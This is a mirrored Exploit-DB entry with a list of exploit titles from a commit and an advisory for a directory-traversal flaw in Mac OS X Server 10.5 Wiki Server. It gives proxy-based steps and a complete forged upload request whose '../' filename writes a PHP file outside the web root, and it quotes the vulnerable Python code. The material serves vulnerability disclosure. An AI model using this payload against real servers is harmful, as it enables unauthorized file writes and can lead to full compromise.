bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/osx/remote/31412.txt
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

153 lines
No EOL
5.6 KiB
Text
Raw Blame History

source: https://www.securityfocus.com/bid/28278/info
Apple Mac OS X Server Wiki Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access arbitrary files outside of the application's document root directory. This can expose sensitive information that could help the attacker launch further attacks.
Note that attackers must be registered wiki users to exploit this issue.
Wiki Server from Mac OS X Server 10.5 is vulnerable.
Next, we show a Proof of Concept (PoC) attack to the Leopard's Wiki
Server. It creates a file 'popote.php' at '/tmp/[xxxxx]/' where
'[xxxxx]' are random hexa characters assigned to the file, as we have
said. You can write on all the folders where user '_teamsserver', the
user running the Wiki Server, has permissions.
For example, to reproduce the attack using Paros proxy [3], follow these
steps:
- Check the web server is up.
- Check you have a system user/password in the system, for example
guest, and the log in.
- Start editing a new post in your blog.
- Start Paros proxy, go to Trap tab and enable Trap requests checkbox.
- Start uploading your preferred file, for example popote.php.
- In Paros, press Continue until you find the POST request.
- Append '../../../../../../..' at the beginning of 'popote.php' plus
your wished path, for example '/tmp/'.
- Press Continue a couple of times to send the request.
- If user '_teamsserver' has permissions on the wished folder, you will
write file 'popote.php' inside subfolder '[xxxxx]', where [xxxxx] are
hash/random hexa characters that depend on the file.
There are several strategies that can be used in combination with a
path traversal to gain complete control of the victim's server, although
we will not discuss them here.
An example forged request follows:
/-----------
POST http://192.168.xxx.xxx/users/guest/weblog/3f081/attachments HTTP/1.0
User-Agent: Opera/9.24 (Macintosh; Intel Mac OS X; U; en) Paros/3.2.13
Host: 192.168.xxx.xxx
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language:
en,ja;q=0.9,fr;q=0.8,de;q=0.7,es;q=0.6,it;q=0.5,nl;q=0.4,sv;q=0.3,nb;q=0.2,da;q=0.1,fi;q=0.1,pt;q=0.1,zh-CN;q=0.1,zh-TW;q=0.1,ko;q=0.1,ru;q=0.1,en;q=0.1
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: identity, *;q=0
Referer: http://192.168.xxx.xxx/users/guest/weblog/3f081/
Cookie: cookies=1; acl_cache=3; recentTags=add tags here;
SQMSESSID=fe79c978b66bf3bf6d0c433abd6008a6;
sessionID=75706E3C-FA5A-4535-85EA-0D69812D21D3; utcOffset=-3; uploadID=57904
Cookie2: $Version=1
Proxy-Connection: close
Content-length: 426
Content-Type: multipart/form-data; boundary=----------YN7xkbcuNgNx21psG30p21
------------YN7xkbcuNgNx21psG30p21
Content-Disposition: form-data; name="Attachment";
filename="../../../../../../../tmp/popote.php"
Content-Type: application/octet-stream
<? phphinfo(); ?>
------------YN7xkbcuNgNx21psG30p21
Content-Disposition: form-data; name="ok_button"
Attach
------------YN7xkbcuNgNx21psG30p21
Content-Disposition: form-data; name="upload_id"
57904
------------YN7xkbcuNgNx21psG30p21--
-----------/
The vulnerable code is located at
'/usr/share/wikid/lib/python/apple_wlt/ContentServer.py':
/-----------
def uploadFileCallback(self, result):
filename, filetype, aFile = result[1][self.type][0]
filename = filename.decode('utf-8')
filename = filename.split('\\')[-1] # IE sends the whole path,
including your local username.
extension = filename.split('.')[-1]
oldFilename = filename
uploadType = os.path.split(self.fullpath)[-1]
if uploadType == "images":
filename = SettingsManager.findGoodName() + '.' + extension
logging.debug("beginning file upload: %s" % filename)
isImage = filenameIsImage(filename)
newPath = ImageUtilities.findUniqueFileName(os.path.join(self.fullpath,
filename), isImage = (not uploadType == 'attachments'))
newFilename = os.path.basename(newPath)
if uploadType == "attachments":
newParentFolder = os.path.dirname(newPath)
os.mkdir(newParentFolder)
newFilename = os.path.join(os.path.basename(newParentFolder), filename)
[...]
-----------/
The hash/random hexa characters used for the attachment subfolder
are generated by code at
'/usr/share/wikid/lib/python/apple_utilities/ImageUtilities.py':
/-----------
def findUniqueFileName(inPath, isImage = True):
"""Uniqueifies a file name, to avoid duplicates in images and
attachments"""
filename = os.path.basename(inPath)
base, extension = os.path.splitext(filename)
parent = os.path.dirname(inPath)
aPath = ''
mungedName = SettingsManager.findGoodName()
if not isImage:
#attachment, so make the minged name a subdirectory and put the file
in that
aPath = os.path.join(parent, mungedName, filename)
while os.path.exists(aPath):
mungedName = SettingsManager.findGoodName(mungedName)
aPath = os.path.join(parent, mungedName, filename)
else:
aPath = os.path.join(parent, mungedName + extension)
while os.path.exists(aPath):
mungedName = SettingsManager.findGoodName(mungedName)
aPath = os.path.join(parent, mungedName + extension)
return aPath
-----------/
Reference in a new issue View git blame Copy permalink